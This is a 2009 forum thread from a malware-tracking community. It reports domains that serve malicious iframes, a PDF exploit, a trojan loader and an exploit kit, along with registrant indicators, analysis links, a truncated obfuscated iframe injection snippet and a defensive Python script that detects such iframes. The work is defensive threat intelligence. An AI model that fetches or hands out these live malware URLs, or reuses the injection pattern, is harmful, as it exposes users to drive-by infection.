Malware Domain List
Malware Related => Malicious Domains => Topic started by: SysAdMini on May 22, 2009, 12:26:42 pm
-
We should keep an eye on this domain.
I have found
glondis.cn/in.cgi?2
glondis.cn/in.cgi?3
in today's logs. They return an iframe to
msnewqqer.com
and
msnerwqrt.com
Neither domain is registered at the moment, but I'm sure they will be.
glondis.cn was registered on May 14, and the registrant is an indicator for malware.
Whenever you see the addresses
Michell.Gregory2009 @yahoo.com / steven_lucas_2000@ yahoo.com
or any combination of the names "Michaell Gregory" and "Steven Lucas" for the registrant, you
probably have found malware.
http://www.malwaredomainlist.com/mdl.php?search=lucas&colsearch=Registrant&quantity=50&inactive=on
http://www.malwaredomainlist.com/mdl.php?search=Gregory2009&colsearch=Registrant&quantity=50&inactive=on
A compromised site which contains an obfuscated iframe to glondis.cn is, for example, bonsai.pl.
Look at the end of the page.
<script type="text/javascript">document.write('\u003c\u0069\u0066\.......</script></body>
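One defensive way to surface what an escaped document.write() like the one above hides, added here as an example and not code from the thread: decode the \uXXXX (and \xHH) escapes, pull the iframe src out of the decoded markup and check the host against a watchlist built from the domains named in this thread. The HTML sample is constructed for illustration, since the real payload is truncated on the page.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the tail of the compromised page (not the real payload).
SAMPLE_HTML = r"""<p>Site content...</p>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022http://glondis.cn/in.cgi?2\u0022 width=1 height=1 style="visibility:hidden"\u003e\u003c/iframe\u003e');</script></body>"""

# Domains named in this thread; extend with your own blocklist feed.
WATCHLIST = {"glondis.cn", "msnewqqer.com", "msnerwqrt.com", "wc-host.in", "poppka.net"}

# document.write('...') or document.write("...") with the string body captured.
_WRITE_RE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
# JavaScript \uXXXX and \xHH string escapes.
_ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
# src attribute of an iframe tag, quoted or unquoted.
_IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def decode_js_escapes(s):
    """Turn \\u003c / \\x3c style escapes back into the characters they encode."""
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def hidden_iframe_hosts(html):
    """Hostnames of iframes written by document.write() anywhere in the page."""
    hosts = []
    for m in _WRITE_RE.finditer(html):
        decoded = decode_js_escapes(m.group(2))
        for src in _IFRAME_SRC_RE.findall(decoded):
            url = src if "://" in src else "http://" + src
            host = urlparse(url).hostname
            if host:
                hosts.append(host)
    return hosts


def flag_page(html, watchlist=WATCHLIST):
    """Sorted list of injected iframe hosts that appear on the watchlist."""
    return sorted({h for h in hidden_iframe_hosts(html) if h in watchlist})


if __name__ == "__main__":
    print(flag_page(SAMPLE_HTML))  # ['glondis.cn']
```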
-
can see that megabot[.]cn was previously implicated
Wepawet (http://wepawet.iseclab.org/view.php?hash=81b8132f01a853d6813e5ef5b44e947f&t=1243011797&type=js)
followed by this exploit (also with an iframe)
hxxp://wc-host.in/mix/in.php
Wepawet fail
pdf exploit
hxxp://wc-host.in/mix/pdf.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=320fd15a566aef7320aaa96048a039a8&t=1243105566&type=js)
VirusTotal (http://www.virustotal.com/analisis/98137e7b8aed76d82961a2306a210b3286b19db6761602c02d2d222850fc7d74-1243104891) - 6/40 (15%)
trojan:
hxxp://wc-host.in/mix/load.php
VirusTotal (http://www.virustotal.com/analisis/1dbbfbcf8241a038041036fb2f8a2a1fa5b10955af07cb47f66fb05dc1e86a2d-1243105044) - 12/40 (30%)
The file has the Windows Media Player Icon
-
glondis.cn has a new destination
Luckysploit
http://poppka.net/pore/?7876256053563003de306eb5c094240d